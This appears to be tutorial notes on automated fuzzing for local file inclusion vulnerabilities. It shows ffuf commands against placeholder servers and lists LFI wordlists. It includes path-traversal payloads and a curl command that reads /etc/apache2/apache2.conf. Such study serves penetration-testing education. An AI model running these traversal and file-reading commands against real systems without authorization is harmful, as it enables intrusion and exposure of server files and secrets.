Autometed Scanning

Web applications often have exposed parameters that are not linked to HTML forms, making them less secure. Fuzzing these parameters can reveal vulnerabilities. The ffuf tool can be used to fuzz GET parameters effectively.

Example of Fuzzing GET Parameters

ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

This command will scan for exposed parameters and help identify potential LFI vulnerabilities.

Wordlist

📜 LFI Wordlists

Manual crafting of LFI payloads is reliable, but quick tests using common LFI payloads can save time. A recommended wordlist is LFI-Jhaddix.txt, which contains various bypasses and common files.

Example of Fuzzing with LFI Wordlist

ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

This command tests the language parameter for common LFI payloads.

Wordlist

🗂️ Fuzzing Server Files

Identifying server files can aid in LFI exploitation. Key files include the server webroot path, configuration files, and logs.

Finding the Server Webroot

To locate the server webroot path, fuzz for the index.php file using common webroot paths.

Example of Fuzzing for Webroot Path

ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

This command helps identify the correct webroot path.

Linux Wordlist

Windows Wordlist

📁 Server Logs/Configurations

Identifying logs and configuration files is essential for further exploitation. The LFI-Jhaddix.txt wordlist can be used to find these paths.

Example of Fuzzing for Server Configurations

ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

This command scans for server configuration files, which may contain valuable information.

Linux Wordlist

Windows Wordlist

Reading Configuration Files

To read a specific configuration file, use curl:

curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf

This retrieves the Apache configuration, revealing the webroot and log paths.

🛠️ LFI Tools

Several tools can automate the LFI exploitation process, such as LFISuite, LFiFreak, and liffy. While these tools can save time, they may miss vulnerabilities that manual testing would catch. Most tools are outdated and rely on Python 2, so their long-term viability is questionable.

Conclusion

Utilizing both manual techniques and automated tools can enhance the effectiveness of identifying and exploiting LFI vulnerabilities. Always verify findings through manual testing to ensure accuracy.